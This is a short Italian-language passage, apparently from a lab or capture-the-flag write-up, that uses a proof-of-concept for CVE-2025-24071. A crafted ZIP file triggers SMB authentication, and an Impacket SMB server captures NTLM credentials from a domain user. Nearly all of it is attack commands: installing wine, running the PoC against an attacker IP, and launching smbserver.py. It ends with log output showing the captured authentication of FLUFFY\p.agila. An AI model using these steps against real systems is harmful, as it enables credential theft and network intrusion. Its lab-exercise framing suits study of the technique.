
Exploit proof-of-concept per CVE-2025-24071, che sfrutta un file ZIP appositamente creato per innescare un relay di autenticazione SMB e catturare hash NTLM tramite Impacket.
sudo apt update sudo apt install wine
wine CVE-2025-24071-POC.exe -i 10.10.14.8 -n try ZIP creato: try.zip
impacket-smbserver:
smbserver.py try /root/smbshare -smb2support -ip 10.10.14.8 -debug Impacket (Exegol fork) v0.13.0.dev0+20250723.125503.b5db2dd7 - Copyright Fortra, LLC and its affiliated companies
[+] Percorso di installazione della libreria Impacket: /root/.local/share/pipx/venvs/impacket/lib/python3.11/site-packages/impacket [] File di configurazione analizzato [] Callback aggiunto per UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0 [] Callback aggiunto per UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0 [] File di configurazione analizzato [] File di configurazione analizzato [] File di configurazione analizzato [] Connessione in entrata (10.129.232.88,51127) [] AUTHENTICATE_MESSAGE (FLUFFY\p.agila,DC01) [*] Utente DC01\p.agila autenticato con successo